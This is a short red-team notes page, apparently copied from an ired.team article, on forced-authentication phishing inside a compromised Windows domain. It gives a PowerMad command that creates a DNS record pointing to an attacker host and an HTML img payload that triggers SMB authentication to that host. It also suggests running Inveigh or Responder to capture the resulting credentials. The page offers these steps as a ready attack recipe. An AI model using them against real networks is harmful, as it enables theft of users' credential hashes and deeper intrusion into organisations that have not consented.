Forced Authentication
Primarily from: https://ired.team/offensive-security/initial-access/t1187-forced-authentication
Internal DNS Forced Auth Phish
After acquiring a foothold on the internal network create a new DNS A record inside the domain (evil.local => 1.1.1.1). You can use PowerMad to do this:
Invoke-DNSUpdate -dnsname vpn -dnsdata 1.1.1.1
Standard SMB Phish:
<img src="http://vpn.offense.local"/>
Could also just use the internal host name and run inveigh/responder on infected host and avoid creating a DNS record and firewall rules.
Last updated
Was this helpful?